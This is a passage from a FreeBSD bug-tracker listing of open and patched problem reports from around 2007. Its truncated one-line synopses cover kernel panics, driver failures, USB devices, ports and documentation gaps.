Gigabyte GA-P35-S3 ( o bin/116413 standards incorrect getconf(1) handling of unsigned constants gi o kern/116335 andre [tcp] Excessive TCP window updates o kern/116328 net [bge]: Solid hang with bge interface o amd64/116322 amd64 [panic] At start fsck on current, the system panics o bin/116302 atacontrol(8) reports wrong stripe for intel raid0 o usb/116282 usb [ulpt] Cannot print on USB HP LJ1018 or LJ1300 o kern/116270 [ata] READ_DMA48 UDMA ICRC error o www/116257 bugmeister query-pr.cgi is broken on ports/114999 o conf/116237 [patch] ugly output of the 405.status-ata-raid if fdes s ports/116222 portmgr files installed with the wrong UID/GID via make instal o ports/116219 edwin [patch] Add @rmtry to bsd.port.mk o bin/116209 [patch] [request] decimal suffix in split(1) o kern/116185 net [iwi] if_iwi driver leads system to reboot o threa/116181 threads /dev/io-related io access permissions are not propagat o kern/116172 bz [tun] [nd6] [panic] Network / ipv6 recursive mutex pan o kern/116170 fs [panic] Kernel panic when mounting /tmp o amd64/116159 amd64 [panic] Panic while debugging on CURRENT o kern/116133 kmacy Recursive lock panic when w_mtx falls into DELAY o docs/116116 doc mktemp (3) re/move note o i386/116100 i386 [panic] Fatal trap 12 right after reboot (da0s1error = o ports/116082 java java/linux-sun-jdk16 jconsole is unable to connect to o stand/116081 standards make does not work with the directive sinclude o docs/116080 tabthorpe PREFIX is documented, but not the more important LOCAL o bin/116074 [libc] fnmatch() does not handle FNM_PERIOD correctly o conf/116071 [patch] loader.conf update some variables o kern/116009 ipfw [ipfw] [patch] Ignore errors when loading ruleset from o kern/116005 des [libfetch] libfetch accepts invalid URLs o kern/115997 scottl [ciss] [panic] [patch?] kernel panics on heavy disk I/ o bin/115960 des sshd's X11 forwarding broken on IPv6 only machine [pat o ports/115957 itetcu Questionable ownership and security on dspam port o ports/115956 dougb dns/bind94: request port update involving dns/bind9-dl o bin/115951 [tun] pppoed(8): tun not closed after client abruptly o i386/115947 i386 [hang] Dell poweredge 860 hangs when stressed and ACPI o bin/115946 des [libpam] [patch] not thread-safe o ports/115940 python Missed one file in lang/python25 if NO_NIS defined o usb/115935 usb [usbdevs] [patch] kernel counterproductively attaches o usb/115933 usb [uftdi] [patch] RATOC REX-USB60F (usb serial converter o kern/115930 jfv [em]: Dell nic enumeration problem s conf/115923 [request] rc.subr - logger should be using priorities o kern/115856 geom [geli] ZFS thought it was degraded when it should have o i386/115854 i386 [boot] [install] Install FreeBSD with USB CDROM causes s amd64/115815 amd64 [ata] [request] Gigabyte GA-M61P-S3 Motherboard unsupp o java/115773 java [request] java.nio channel selectors should use kqueue p kern/115755 ipfw [ipfw] [patch] unify message and add a rule number whe o ports/115746 portmgr new ports category - meta f usb/115737 linimon [uplcom] uplcom doesn't identify my Prolific 2303 any s docs/115716 jhb remove cue from supported hardware list o kern/115695 [crypto] When "device padlock" defined first ssh to ma o kern/115666 multimedia [sound] Microphone does not work o kern/115651 vanhu Racoon(ipsec-tools) enters sbwait state or 100% CPU ut o kern/115645 fs [snapshots] [panic] lockmgr: thread 0xc4c00d80, not ex o kern/115631 [libc] [patch] [request] make dlclose(3) atexit-aware a kern/115623 imp [cardbus] [patch] Xircom CardBus Ethernet II 10/100 Ad f kern/115619 [sysvshm] Unfinished (uncompliant?) support for POSIX f kern/115614 thomas [ata] Recent ATA driver changes have broken cdrecord [ o kern/115606 [mpt] [panic] Panic while using mpt controller o amd64/115581 amd64 [Makefile] [patch] -mfancy-math-387 has no effect o kern/115547 geom [geom] [patch] [request] let GEOM Eli get password fro o kern/115526 piso [libalias] libalias doesn't free memory o bin/115486 [patch] [request] newsyslog(8) -- provide ability to c o www/115481 remko ASUS P5K SE motherboard status for amd64 o kern/115479 [ata] [request] ASUS P5K SE need more support o ports/115461 pgollucci [patch] bsd.apache.mk - Create packages for apache mod o bin/115447 harti [patch] [request] teach make(1) to respect TMPDIR envi o ports/115437 nobutaka multimedia/libxine: does not compile with certain env o bin/115431 [patch] [request] improvement to split(1): add -B swit o bin/115406 [patch] gpt(8) GPT MBR hangs award BIOS on boot o usb/115400 usb [ehci] Problem with EHCI on ASUS M2N4-SLI o kern/115374 [panic] vm_fault: fault on nofault entry, addr: e120d0 o kern/115371 imp [cardbus] [patch] Device removal leaves resource datab o bin/115361 fs [zfs] mount(8) gets into a state where it won't set/un o ports/115304 multimedia/gpac-mp4box cannot import files larger than o kern/115300 multimedia [snd_hda] snd_hda(4) fails to attach on -CURRENT [regr o usb/115298 usb [ulpt] [panic] Turning off USB printer panics kernel o i386/115285 i386 [panic] fatal trap 1 on freebsd 6.2 install boot up on o kern/115275 [wi] [panic] wi configure at boot time led to panic "i o kern/115253 [keyboard] Wireless keyboard not working at boot o bin/115242 ntpd(8): Incorrectly working ntpd on 7.0 [regression] o kern/115239 net [ipnat] panic with 'kmem_map too small' using ipnat o kern/115232 [ata] Audio CD tracks not displayed properly by atapi f kern/115226 vwe [ath] ath0: unable to attach hardware; HAL status 13 o threa/115211 threads pthread_atfork misbehaves in initial thread s kern/115202 [request] memory error diagnostic o bin/115197 kensmith sysinstall(8): can not install from USB stick drive o kern/115196 bushman [libc] [patch] [request] Implement getgroupmembership( o amd64/115194 amd64 LCD screen remains blank after Dell XPS M1210 lid is c o bin/115174 [patch] growfs(8) needs zero-writing for safe filesyst o bin/115172 ipfw [patch] ipfw(8) list show some rules with a wrong form o kern/115164 des [libpam] [patch] [request] Add support for the account o kern/115162 des [libpam] [patch] [request] Add check for target user's o kern/115152 [ata] Sil 3512 SATA controller panics on 6.2 o kern/115133 scottl [mpt] [mfi] [patch] Patches to make mfi support LSI SA o amd64/115126 yongari [nfe] nfe0: watchdog timeout (missed Tx interrupts) -- o docs/115065 doc [patch] sync ps.1 with p_flag and keywords o bin/115054 ntpd(8): NTP errors out on startup but restart of NTP p misc/115025 edwin [tools] [patch] new flash device for nanobsd's FlashDe o kern/115019 net [netgraph] ng_ether upper hook packet flow stops on ad o kern/115002 net [wi] if_wi timeout. failed allocation (busy bit). ifco o kern/114995 [drm] acpi_video prevents savage drm from loading succ o kern/114970 Wrong system time (last) when machine is crashed due t o kern/114955 fs [cd9660] [patch] [request] support for mask,dirmask,ui o kern/114928 green_saver does not switch DVI monitor power off o usb/114916 usb [umass] [patch] USB Maxtor drive (L300RO) requires qui o kern/114915 net [patch] [pcn] pcn (sys/pci/if_pcn.c) ethernet driver f o kern/114847 fs [ntfs] [patch] [request] dirmask support for NTFS ala o kern/114839 net [fxp] fxp looses ability to speak with traffic o ports/114813 lioux [new port] finance/qtstalker-devel o kern/114808 [panic] Kernel panic when use USB SpeedTouch ADSL mode o kern/114780 usb [uplcom] [panic] Panics while stress testing the uplco o kern/114760 multimedia [snd_cmi] snd_cmi driver causing sporadic system hangs s ports/114725 portmgr bsd.port.mk - No dependencies in the package if there o kern/114714 thompsa [gre] [patch] gre(4) is not MPSAFE and does not suppor o usb/114682 usb [umass] generic USB media-card reader unusable o kern/114677 [drm] Xorg will not run with dri glx and drm on ATI Ra o kern/114676 fs [ufs] snapshot creation panics: snapacct_ufs2: bad blo o kern/114667 [umass] UMASS device error log problem p kern/114655 bushman Implement getgroupmembership in net/nss_ldap p kern/114646 firewire [firewire] [patch] firewire fails after suspend/resume o java/114644 java tomcat goes out of PermSpace, jvm crashes o stand/114633 linimon /etc/rc.subr: line 511: omits a quotation mark: "force f kern/114631 yongari [msk] "Tx descriptor error" with Marvell Yukon o ports/114611 edwin [NEW PORT] net-p2p/freenet05: An anonymous censorship- o kern/114597 scsi [sym] System hangs at SCSI bus reset with dual HBAs s kern/114578 [libc] wide character printing using swprintf(dst, n, o kern/114567 pf [pf] [lor] pf_ioctl.c + if.c o i386/114562 acpi [acpi] cardbus is dead after s3 on Thinkpad T43 with a o kern/114550 [cbb] Cardbus WiFi card activation problem o kern/114546 [drm] [panic] Sleeping thread owns a non-sleepable loc o kern/114532 geom [geom] GEOM_MIRROR shows up in kldstat even if compile f ports/114509 girgen [UPDATE]: java/eclipse-cdt to 4.0 o kern/114506 [nfs] nfs_readdirrpc doesn't use copyout to write out o kern/114492 [kernel] [patch] device_attach() doesn't unset devclas o kern/114489 scottl [aic] [panic] _mtx_lock_sleep: in aic7xxx_osm.h (with o bin/114468 fs [patch] [request] add -d option to umount(8) to detach o bin/114465 [patch] [request] script(1): add really cool -d, -p & o kern/114459 [aic] [panic] FreeBSD-CURRENT crash during boot with A o kern/114451 [nfs] [patch] prevent NFS server possible crash o kern/114438 [amr] Anomalous performance with multiple arrays and a o kern/114406 [drm] ATI Radeon Mobility X600 not supported by agp de s bin/114392 [request] add default ssl definitions for openssl(1) o docs/114371 doc [patch] [ip6] rtadvd.con(5) should show how to adverti o ports/114365 edwin New port: net-mgmt/nagiosgrapher o sparc/114349 kuriyama When executing snmpd it immediately stops with a segme f kern/114331 vanhu [crypto] [patch] VIA padlock freesession bug p kern/114325 bz [jail] SIOCGIFADDR ioctl behaves incorrectly inside ja o usb/114310 usb [libusb] [patch] [panic] USB hub attachment panics ker o kern/114291 kmacy [RFE] [modules] [patch] add dynamic module references o amd64/114270 amd64 [cpufreq] cpufreq doesnt work when compiled in to kern p kern/114237 csjp [lor] kernel lock o ports/114231 edwin [patch] multimedia/audacious-plugins - audacious/plugi f ports/114229 nork [patch] [www/linuxpluginwrapper] libmap.conf-FreeBSD6 o kern/114213 [ata] optical drive not detected in the 6.x series of o i386/114208 i386 [boot] Problem booting the FreeBSD CD ISO image o i386/114192 i386 Fail to boot with "error issuing ATA_IDENTIFY command" o docs/114184 doc [patch] [ndis]: add info to man 4 ndis o ports/114167 portmgr [patch] bsd.port.mk - ignoring major numbers in LIB_DE o kern/114165 acpi [acpi] Dell C810 - ACPI problem o kern/114155 [ptrace] sigsuspend gets interrupted by ptrace o docs/114139 doc mbuf(9) has misleading comments on M_DONTWAIT and M_TR o bin/114129 mux [patch] csup(1) doesn't support authentication o ports/114122 timur New port: russian/stardict2-dict-eng_RU, Russian dicti o kern/114111 [nfs] System crashes while writing on NFS-mounted shar o ports/114106 mail/postgrey does not properly shut down via rc.d scr p conf/114101 se [patch] Add ZFS to periodic locate run o ports/114096 steve Upgrade x11-toolkits/open-motif to OM 2.3 o kern/114095 pf [carp] carp+pf delay with high state limit o bin/114082 [make.conf] default CFLAGS have a blank at the end o bin/114081 bz [patch] [ppp] ppp(8) should be able to set ethernet ad o usb/114068 usb [umass] [patch] Problems with connection of the umass o bin/114059 [patch] shutdown(8) should fall back to exec reboot/ha o kern/114057 [devfs] devfs symlink over device doesn't work o conf/114013 usb [patch] WITHOUT_USB allow to compil a lot of USB stuff o bin/113979 matteo [patch] sysinstall(8) does not support UFS1 filesystem s usb/113977 usb [request] Need a way to set mode of USB disk's write c o kern/113957 geom [gmirror] gmirror is intermittently reporting a degrad s kern/113950 multimedia [sound] [patch] [request] add per-vchan mixer support o conf/113915 rc [patch] ndis wireless driver fails to associate when i o conf/113913 [patch] [requst] new file /etc/periodic/daily/490.stat o bin/113912 tunefs(8): silent failure setting glabel on boot parti o kern/113895 net [xl] xl0 fails on 6.2-RELEASE but worked fine on 5.5-R o kern/113885 geom [gmirror] [patch] improved gmirror balance algorithm o bin/113881 [patch] sysctl(8): Wrong memory usage o kern/113856 [patch] [plip] PLIP (parallel port IP) dead on 6.2, de o i386/113853 FreeBSD 6.2-RELEASE Crashes and Reboots on i386 o kern/113852 fs [smbfs] smbfs does not properly implement DFS referral o kern/113851 [boot] Unable to boot install cd from USB-CDROM o bin/113850 sshd(8): unable to debug sshd with strace/truss/gdb o kern/113849 [libdisk] [patch] Correction of Sanitize_Bios_Geom for a kern/113842 bz [ip6] PF_INET6 proto domain state can't be cleared wit o bin/113838 fs [patch] [request] mount(8): add support for relative p o kern/113837 geom [geom] unable to access 1024 sector size storage o bin/113825 [patch] [libc] [ggated] Fix -STABLE build with -fno-st o docs/113803 ipfw [patch] ipfw(8) - don't get bitten by the fwd rule o kern/113785 firewire [firewire] dropouts when playing DV on firewire o ports/113751 java java/linux-sun-jdk15: linux-sun-jdk-1.5.0.12,2 - java o ports/113707 girgen databases/postgresql81-server - PostgreSQL RC start sc o bin/113702 krion [patch] bad output from "pkginfo -g" o bin/113682 [patch] sysinstall(8) warns for invalid geometry which o usb/113672 usb [ehci] [panic] Kernel panic with AEWIN CB6971 o bin/113669 ftpchroot(5) / ftpusers(5) doesn't do globbing s usb/113629 usb [ukbd] Dropped USB keyboard events on Dell Latitude D6 o sparc/113556 sparc64 [panic] trap: memory address not aligned; Rebooting... o conf/113552 [request] ntpd(8) driftfile default location inconsist o bin/113518 [patch] make(1): Prevent execution when command is a c f ports/113479 perky science/Gramps 2.2.x needs py-bsddb with db43 on FreeB o kern/113478 [boot] [request] FreeBSD could not start on Core2Duo n o ports/113467 java Multiple "missing return value" errors building JDK on s bin/113456 [request] gpt(8) does not allow changing partition tab o kern/113439 [panic] 6.2 Kernel Panic o usb/113432 usb [ucom] WARNING: attempt to net_add_domain(netgraph) af o kern/113427 [fxp] fxp0: device timeout when writing to USB and pla o kern/113419 geom [geom] geom fox multipathing not failing back o bin/113398 [libc] [patch] initgroups fails rather than truncates p kern/113388 ipfw [ipfw] [patch] Addition actions with rules within spec o bin/113345 mux csup(1) broken: Updater failed: Bad diff from server o gnu/113343 [patch] grep(1) outputs NOT-matched lines (with multi- o gnu/113338 gcc(1): GNU gcc __thread as class member o ports/113295 kde net-im/kopete: pleawse add 'make config' to choose kop p kern/113266 harti [libgssapi] [patch] Missing handling of mech_type in g o conf/113265 [patch] Add registered epmd port number to etc/service o ports/113264 ale databases/mysql51-server compilation doesn't allow for o kern/113256 [headers] _limits.h for some CPU has wrong definitions o bin/113239 [patch] atrun(8) loses jobs due to race condition o bin/113230 des [pam] [patch] const-ify PAM-headers o docs/113194 doc [patch] [request] crontab.5: handling of day-in-month o kern/113180 fs [zfs] Setting ZFS nfsshare property does not cause inh o kern/113138 [irq] interrupt storm on 6.x kernels on an MS-1029 (AM o conf/113117 linimon [iwi] if_iwi isn't present in today's CURRENT/AMD64 o i386/113110 i386 [mk] [patch] i686 is not an alias of pentiumpro on GCC o ia64/113102 ia64 [MCA] Multiple records can have the same sequence numb f ports/113099 tmclaugh [PATCH] sysutils/libchk may skip $X11BASE now o kern/113098 [amr] Cannot read from amrd while under heavy load o ports/113096 edwin [patch] x11/xorg - X.org manpages broken o bin/113074 [patch] ppp(8): include for strcasecmp(3) a usb/113060 usb [usbdevs] [patch] Samsung printer not working in bidir o bin/113049 fs [patch] [request] make quot(8) use getopt(3) and show o conf/112997 [patch] Add note about the 'native' mtune option to sh p bin/112955 des [patch] login(1): add netgroup support back to pam_log o usb/112944 usb [ulpt] [patch] Bi-directional access to HP LaserJet 10 o kern/112938 [headers] [patch] utmp.h is too limiting for modern sy o kern/112937 jfv [em] Panic in em(4) when issuing a SIOCGIFADDR ioctl p docs/112935 remko [patch] newfs_msdos(8): document 4.3g limit on files w o ports/112818 sem ports-mgmt/portupgrade -a fails with database error o docs/112804 doc groff(1) command should be called to explicitly use "p o bin/112794 [patch] [request] pam_exec(8): allow pam_exec to expor o kern/112775 [libmd] [patch] libmd(3) bug for some zero-length file o bin/112757 sysinstall(8): sysinstall(8): in the FDISK tool we can o ports/112745 portmgr bsd.port.mk: Add a package-smart target o kern/112722 net [ipsec] [udp] IP v4 udp fragmented packet reject o kern/112708 ipfw [ipfw] ipfw is seems to be broken to limit number of c o kern/112707 [panic] 6.2-STABLE panic: spoiling cp->ace = 3 o kern/112702 jfv [em] em driver doesn't use MSI on MSI capable device o i386/112700 i386 SMP Kernel with FreeBSD 6.2 release on compaq dl360 g1 a bin/112694 [patch] segfault in pam_lastlog(8) on sshd exit when n o kern/112686 net [patm] patm driver freezes System (FreeBSD 6.2-p4) i38 o docs/112682 doc Handbook GEOM_GPT explanation does not provide accurat o bin/112674 calendar(1): There appears to be a bug in /usr/bin/cal o bin/112673 [patch] pkg_add(1): pkg_add -S leaks the temp dir o kern/112658 fs [smbfs] [patch] smbfs and caching problems (resolves b o usb/112640 usb [usb] [hang] Kernel freezes when writing a file to an o i386/112635 i386 [hang] [loader] Hang during boot installation o usb/112631 usb [panic] Problem with SONY DSC-S80 camera on umount a bin/112613 vwe ls(1): 'ls -l' is very slow or doesn't work at all o kern/112612 andre [lo] Traffic via additional lo(4) interface shows up o o ports/112607 lwhsu New port: devel/openldev A graphical front-end g++/gcc o java/112595 java Java appletviewer frequently hangs (kse_release loop) f kern/112591 linimon Non-monitored locks are dummy-implemented o i386/112580 i386 [boot] BTX Halted on HP DV6255 Notebook o docs/112579 mlaier [request] No ipv6 related pf examples in /usr/share/ex o kern/112570 net [bge] packet loss with bge driver on BCM5704 chipset s usb/112568 usb [umass] [request] USB mode may wrong when mounting Pla o kern/112561 ipfw [ipfw] ipfw fwd does not work with some TCP packets o conf/112558 [patch] /etc/periodic/daily/200.backup-passwd poor han o bin/112557 net [patch] ppp(8) lock file should not use symlink name o bin/112556 [patch]: sysctl(8) needs to fix multi-lineal descripti p kern/112554 silby [kernel] [patch] unp_gc is overly agressive and remove s kern/112544 acpi [acpi] [patch] Add High Precision Event Timer Driver f o kern/112528 net [nfs] NFS over TCP under load hangs with "impossible p o ports/112497 portmgr Mk/bsd.port.mk: make ldconfig permanent for non-defaul o i386/112487 i386 [sio] kernel panic on swi0:sio o kern/112477 marius [ofw] [patch] Add support to set the node and type on o usb/112463 usb [umass] problem with Samsung USB DVD writer, libscg an o usb/112461 usb [ehci] [request] ehci USB 2.0 doesn't work on nforce4 o conf/112441 deprecated lines in /etc/hosts.allow o bin/112408 mp [regression] tcsh(1): tcsh causes gdb to hang (regress o bin/112379 [patch] [request] lockf(1): on closing stdin, stdout, o bin/112370 getfacl(1): incorrect display group name by ``getfacl' p ports/112347 obrien [PATCH] editors/vim re-enable WITH_TCL o bin/112336 [patch] install(1): install -S (safe copy) with -C or o bin/112288 ftp(1): /usr/src/usr.bin/ftp/config.h is redundant and o kern/112282 [ata] atacontrol(8): changing DMA modes when disk is r o kern/112256 [hang] SC_PIXEL_MODE hangs system o amd64/112222 amd64 [libc] 32-bit libc incorrectly converts some FP number s gnu/112215 obrien [patch] gcc(1): "gcc -m32" attempts to link against 64 o bin/112213 [patch] touch(1)ing a directory and failing yields ret o kern/112181 [panic] Kernel Panic on HP DL320-G5 Running 6.2-STABLE o kern/112160 [pppd] uplink DSL w/pppoe+NAT 'out of buffer space' ki o kern/112053 [hang] deadlock with almost full filesystem and rtorre o i386/112036 i386 [ata] TIMEOUT - WRITE_DMA retrying, TIMEOUT - READ_DMA f amd64/111994 jkoshy [hwpmc] [request] hwpmc(3) doesn't know about Intel 51 f kern/111990 [pccbb] [patch] system freeze in initialization proces o bin/111978 [patch] [request] make syspath list for mount(8) confi o kern/111967 [geli] glabel - label is seemingly not written to disk o kern/111848 [nfs] removing a file from a diskless nfs mounted root o kern/111843 fs [msdosfs] Long Names of files are incorrectly created f bin/111835 fstat(1) fails to report certain files s www/111791 www FreeBSD website messes up while using "links" browser o kern/111782 fs [ufs] dump(8) fails horribly for large filesystems o kern/111767 multimedia [sound] ATI SB450 High Definition Audio Controller sou o kern/111766 [panic] "panic: ffs_blkfree: freeing free block" durin o usb/111753 usb [uhid] [panic] Replicable system panic involving UHID o conf/111557 [gre] link1 flag doesn't work as intended when specifi o kern/111537 kmacy [inet6] [patch] ip6_input() treats mbuf cluster wrong o ports/111501 [NEW PORT] databases/ruby-oci8 o bin/111493 [patch] routed(8) doesn't use multicasts for RIPv2 via o kern/111457 net [ral] ral(4) freeze o docs/111425 doc Missing chunks of text in historical manpages o ports/111399 doceng print/ghostscript8 (was ghostscript-gpl): WITH_FT_BRID a ports/111356 csjp net/bpfstat: man bpfstat has no descption for the flag o bin/111343 sh(1) and bash(1) with -e sometimes fail to test error o power/111296 ppc [kernel] [patch] [request] Support IMISS, DLMISS an DS o docs/111265 doc [request] Clarify how to set common shell variables p kern/111260 csjp [hang] FreeBSD kernel dead lock and a solution o www/111228 bugmeister [request] Usability improvements for bug search query o bin/111226 [patch] Incorrect usage of chflags() in various FreeBS o kern/111220 pf [pf] repeatable hangs while manipulating pf tables o kern/111196 [ata] [hang] SATA drives cause errors and cause system o kern/111185 console color depth set to 0 at boot causes flat scree o kern/111162 [nfs] nfs_getpages does not restart interrupted system o docs/111147 doc hostapd.conf is not documented s bin/111146 fs [2tb] fsck(8) fails on 6T filesystem o bin/111077 date(1): /bin/date -j -f "%b %Y" "Feb 2007" +%m return o ports/111066 secteam ports-mgmt/portaudit does not skip ports fixed listed o bin/111024 [request] [patch] atacontrol(8): support for stand-by p kern/111023 mav [ata] [request] [patch] please expand ata timeouts s kern/111001 [hang] can't install 6.2-RELEASE-amd64 (SuperMicro PDS o docs/110999 doc carp(4) should document unsupported interface types o kern/110995 kmacy [loader] [patch] loader wastes space worth symtab size o conf/110993 [patch] /etc/netstart should start rpcbind o gnu/110971 gdb(1) crashes f kern/110959 bz [ipsec] Filtering incoming packets with enc0 does not o kern/110915 rwatson [acl] ACL's don't work with SUIDDIR o java/110912 java Java krb5 client leaks UDP connections o bin/110887 [patch] truss(1) missing linux_access syscall descript o usb/110856 usb [ugen] [patch] interrupt in msgs are truncated when bu o kern/110847 scsi [ahd] Tyan U320 onboard problem with more than 3 disks s conf/110838 pf [pf] tagged parameter on nat not working on FreeBSD 5. s ports/110826 dinoex port graphics/tiff: tiff2pdf tints images with wrong c f kern/110720 kmacy [net] [patch] [request] support for interface descript p bin/110705 geom gmirror(8) control utility does not exit with correct o docs/110692 doc wi(4) man page doesn't say WPA is not supported p kern/110662 sam [safe] safenet driver causes kernel panic o threa/110636 threads [request] gdb(1): using gdb with multi thread applicat o amd64/110599 amd64 [geli] geli attach to gmirror device hangs and cannot o ports/110533 olgeni [patch] WITHOUT_NLS support for www/neon and www/sitec o kern/110407 [ata] ATA drivers not recognizing Seagate CF Microdriv o kern/110392 scottl [hptmv] [patch] hptmv very old and missing important f o docs/110376 doc [patch] add some more explanations for the iwi/ipw fir o docs/110359 brueffer mpt man page omission o threa/110306 threads apache 2.0 segmentation violation when calling gethost o kern/110284 kmacy [if_ethersubr] [patch] Invalid Assumption in SIOCSIFAD o docs/110253 doc [patch] rtprio(1): remove processing starvation commen o kern/110249 kmacy [kernel] [regression] [patch] setsockopt() error regre o i386/110218 i386 kmem_malloc(4096): kmem_map too small: 335544320 total o i386/110214 i386 [hang] FreeBSD 6.2 freezes on SSH activitiy caused by o kern/110199 jmg [kqueue] [patch] kqueue_register doesn't update the kn o usb/110197 usb [umass] Sony PSP umass device does not detach from EHC o bin/110151 sysinstall(8): sysinstall(8) don't respects install ro o bin/110146 [patch] [request] Allow arbitrary gdb(1) options to by o kern/110140 net [ipw] ipw fails under load o kern/110110 [hang] sysctl causing a lockup o bin/110068 [patch] rewrite of mdmfs(8) in shell o kern/110065 [wi]: wi device cannot attach to D-Link DWL-520 rev. E o docs/110062 doc [patch] mount_nfs(8) fails to mention a failure condit o docs/110061 doc [patch] tuning(7) missing reference to vfs.read_max o kern/110017 [libexec] [patch] serial port console output garbled o docs/109981 doc No manual entry for post-grohtml o conf/109980 rc /etc/rc.d/netif restart doesn't destroy cloned_interfa o docs/109977 doc No manual entry for ksu p docs/109975 trhodes No manual entry for elf2aout o docs/109973 doc No manual entry for c++filt o docs/109972 doc No manual entry for zless/bzless o kern/109968 [boot] [panic] Panic while booting with PCscsi II AM53 o kern/109936 [smp] SMP kernel performance problem on FSC TX600 o bin/109911 mountd(8) does not accept identical host sets on diffe o kern/109889 [panic] 6-STABLE panic kern_timeout.c o bin/109827 mount_smbfs(8) didn't handle password authentication c o kern/109813 [ciss] ciss(4) driver API header is not installed o kern/109809 [vmware] CPU hits 100% when issuing the halt command ( o kern/109762 [hang] deadlock in g_down -> ahd_action -> contigmallo o ports/109745 kris NO_PACKAGE handling by ports build system o kern/109743 [sio] The sio(4) driver appears to be getting the seri o kern/109736 [ata] FreeBSD sysinstall from CD can't find & mount NE o kern/109733 net [bge] bge link state issues [regression] o docs/109612 remko Manuals that live in ARCH specific subdirectories are o i386/109610 i386 [panic] Fatal trap 12: page fault while in kernel mode p amd64/109584 edwin [patch] zdump(8) doesn't work a ports/109580 glewis [patch] math/gnuplot does not include bsd.emacs.mk whe o bin/109569 mail(1) command not parsing sendmail parameters o i386/109568 i386 [panic] Reboot server with "Fatal trap 12" p bin/109567 delphij gzip(1) does not detect my packed file o conf/109562 rc [rc.d] [patch] [request] Make rc.d/devfs usable from c o ports/109550 python lang/python25 does not install /usr/local/bin/python o bin/109521 [patch] chio(1): 'chio return' breaks on non-voltag ch o ports/109501 krion [PATCH] add some configurable vars to mail/exim o bin/109478 [libc] [patch] adopt reentrant syslog functions from O a kern/109477 yongari [vr] [patch] onboard via vt6103 ethernet does not work o kern/109470 net [wi] Orinoco Classic Gold PC Card Can't Channel Hop o i386/109423 i386 [ichsmb] ICH5 smb interface problems o kern/109416 des [libpam] [patch] pam_group doesn't check login_group m o bin/109413 jhb [patch] top(1) shows at least 50% idle when hyperthrea o kern/109406 thompsa [ndis] Broadcom WLAN driver 4.100.15.5 doesn't work wi o usb/109397 usb [panic] on boot from USB flash o kern/109377 daichi [unionfs] unionfs crashes if underlying file system fo f conf/109367 i18n [locale] UTF8 encoded locales and problem collating ac o conf/109354 [request] /etc/periodic/daily/110.clean-tmps does not o bin/109334 pkg_add(1) using chroot exits with error if wrong dire o kern/109308 net [pppd] [panic] Multiple panics kernel ppp suspected [r o kern/109277 [pppd] [patch] : kernel ppp(4) botches clist reservati o usb/109274 usb [usb] MCP55 USB Controller fails to attach in AMD64 Cu o conf/109272 [request] increase default rc shutdown timeout o kern/109251 net [re] [patch] if_re cardbus card won't attach o kern/109232 imp [sio] [patch] ibufsize calculation wrong causing data o kern/109227 [ral] ral(4) driver doesn't handle correctly RT2561C P f docs/109226 doc [request] No manual entry for sntp o docs/109201 doc [request]: manual for callbootd s i386/109200 i386 [ata] READ_UDMA UDMA ICRC error cause not detecting ca o kern/109161 philip [psm] synaptic touchpad doesn't work o docs/109105 trhodes security.mac.bsdextended.firstmatch_enabled is not ena o docs/109104 trhodes man mac_bsdextended is not consistent with systl outpu o bin/109102 csjp sysctl security.mac.bsdextended is not consistent with o kern/109024 fs [msdosfs] mount_msdosfs: msdosfs_iconv: Operation not o kern/109010 fs [msdosfs] can't mv directory within fat32 file system o docs/109008 csjp [patch] add summary of kern/48198 to jexec(8) a docs/108980 doc list of missing man pages o kern/108968 [panic] Double mount then umount and ls resuits in pan s bin/108961 vwe ls(1) High CPU use on directories containing files wit o kern/108954 acpi [acpi] 'sleep(1)' sleeps >1 seconds when speedstep (Cx o kern/108924 [ar] Panics when Intel MatrixRAID RAID1 is degraded o bin/108895 net pppd(8): PPPoE dead connections on 6.2 [regression] s amd64/108861 amd64 [nve] nve(4) driver on FreeBSD 6.2 AMD64 does not work o kern/108829 [radeon] radeon module fails with thinkpad T43 o ports/108795 ports/icc: Proposed update to icc port for intel compi s bin/108743 vwe [patch] who(1): IPv6 addresses truncated to maximum IP f sparc/108732 sparc64 ping(8) reports 14 digit time on sparc64 o kern/108695 acpi [acpi]: Fatal trap 9: general protection fault when in o kern/108670 silby [tcp] TCP connection ETIMEDOUT o kern/108659 [psm] Mouse (Synaptics touchpad) cursor freezes for so o bin/108656 [patch] Segfault of sshd(8) for unknown user when priv o kern/108655 messages from kernel are mixed (/dev/klog? syslog?) o kern/108651 [hang] option PREEMPTION causes machine hangs on TYAN o conf/108589 rc rtsol(8) fails due to default ipfw rules o ports/108570 girgen databases/postgresql82-server fails when PREFIX is set o kern/108542 net [bce] Huge network latencies with 6.2-RELEASE / STABLE p bin/108523 trhodes [patch] daemon(8): support for dropping privileges s ports/108514 portmgr [feature request] Automatic registering of UID and GID o usb/108513 usb [umass] Creative MuVo TX FM fails in 6.2-RELEASE [regr o kern/108488 acpi [acpi] ACPI-1304: *** Error: Method execution failed o kern/108485 [re] stress2-udp with realtek 8169S gigabit interface o bin/108462 [request] pkg_info(1) shouldn't have a hard width limi s kern/108442 [request] UTF-8 support for console o kern/108418 [panic] Kernel panic after killing kdm. p stand/108390 kib [kernel] [patch] wait4() erroneously waits for all chi o kern/108379 [ata] Secondary SATA drive not detected by FreeBSD 6.2 p bin/108368 [patch] tip(1) coredumped when 'du' capability is used o kern/108361 [lpt] lpt0: device busy with HP 710c parallel printer s usb/108344 usb [panic] kernel with atausb panics when unplugging USB f ports/108313 openoffice editors/openoffice.org port build fails o kern/108202 [atapicam] atapicam error after upgrade to 6.2 [regres f kern/108197 jinmei [panic] [gif] [ip6] if_delmulti reference counting pan o bin/108191 matteo sysinstall(8): Disklabel editor help text (by F1 key) o i386/108185 i386 [panic] freebsd 6.2 fatal kernel trap o ports/108169 apache www/apache20 wrong AP_SAFE_PATH for suEXEC s ports/108153 portmgr ports extraction with package uid/gid and quota proble o kern/108133 jmg [bktr] [patch] bktr driver doesn't recognize Hauppauge o bin/108118 [libc] files should not cache their EOF status o docs/108101 doc /boot/default/loader.conf contains an incorrect commen o kern/108100 [ktr] sysctl debug.ktr.alq_enable=1 results in reboot o usb/108056 usb [ohci] Mouse gets powered off during device probe when o bin/108033 ls(1) coredumps when nss/ldap is misconfigured o bin/108020 comsat(8) does not verify return values of getpwnam an o kern/108017 acpi [acpi]: Acer Aspire 5600 o kern/107944 net [wi] [patch] Forget to unlock mutex-locks o usb/107935 usb [uplcom] [panic] panic while accessing /dev/cuaU0 o usb/107924 usb [patch] usbd(8) does not call detach o kern/107850 net [bce] bce driver link negotiation is faulty o usb/107848 usb [umass] [request] cannot access Samsung flash disk o bin/107830 fdisk(8): Change Units (Z) in fdisk doesn't work when o bin/107829 fs [2TB] fdisk(8): invalid boundary checking in fdisk / w o usb/107827 usb 